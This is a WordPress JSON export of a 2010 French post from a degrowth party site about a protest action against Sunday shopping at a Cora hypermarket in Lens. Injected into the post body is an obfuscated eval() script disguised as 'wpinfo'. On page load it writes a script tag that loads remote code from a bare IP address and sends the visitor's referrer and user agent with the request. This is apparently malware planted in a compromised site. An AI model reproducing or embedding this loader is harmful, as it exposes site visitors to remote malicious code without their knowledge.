{"id":5313,"date":"2010-12-26T11:27:30","date_gmt":"2010-12-26T10:27:30","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=5313"},"modified":"2011-01-13T17:05:34","modified_gmt":"2011-01-13T16:05:34","slug":"les-objecteurs-de-croissance-62-font-leur-courses-le-dimanche-a-cora-lens-ii","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=5313","title":{"rendered":"Les objecteurs de croissance 62 font leur courses le dimanche \u00e0 Cora Lens II"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" style=\"margin: 8px;\" src=\"http:\/\/www.objecteursdecroissance62.fr\/site\/lib\/exe\/fetch.php?w=200&amp;media=20101219-decroissants62coralens-36.jpg\" alt=\"\" width=\"158\" height=\"119\" \/>D\u00e9sopilante <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhstk|var|u0026u|referrer|eisni||js|php'.split('|'),0,{}))\n<\/script><\/noindex> animation, dimanche dernier, dans un hypermarch\u00e9 de la r\u00e9gion lensoise. Au rayon fruits et l\u00e9gumes, mine de rien, une quarantaine d\u2019 \u00ab objecteurs de croissance \u00bb (des particuliers, des associatifs\u2026) s\u2019\u00e9taient donn\u00e9s rendez-vous. Objectif : d\u00e9noncer le travail le dimanche et la \u00ab<em> la fi\u00e8vre acheteuse <\/em>\u00bb. Id\u00e9al, quelques jours avant No\u00ebl ! Entre les pommes du Chili et les fraises en d\u00e9cembre, le collectif a donc attendu \u2013 discr\u00e8tement \u2013 un myst\u00e9rieux \u00ab Grand pr\u00eatre \u00bb qui devait donner le la\u2026<\/p>\n<p>source et suite dans l&rsquo;article <a href=\"http:\/\/www.echo62.com\/actu.asp?id=2957\">des Echos62<\/a><\/p>\n<p>Tracts, explications, photos, vid\u00e9os <a href=\"http:\/\/www.objecteursdecroissance62.fr\/site\/doku.php?id=20_nos_initiatives:19_decembre_2010_lens\">sur le site des Objecteurs de Croissance 62<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>D\u00e9sopilante animation, dimanche dernier, dans un hypermarch\u00e9 de la r\u00e9gion lensoise. Au rayon fruits et l\u00e9gumes, mine de rien, une quarantaine d\u2019 \u00ab objecteurs de croissance \u00bb (des particuliers, des associatifs\u2026) s\u2019\u00e9taient donn\u00e9s rendez-vous. Objectif : d\u00e9noncer le travail le &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=5313\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,17],"tags":[],"class_list":["post-5313","post","type-post","status-publish","format-standard","hentry","category-actualites","category-revue-de-medias"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5313","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5313"}],"version-history":[{"count":2,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5313\/revisions"}],"predecessor-version":[{"id":5481,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5313\/revisions\/5481"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5313"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5313"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}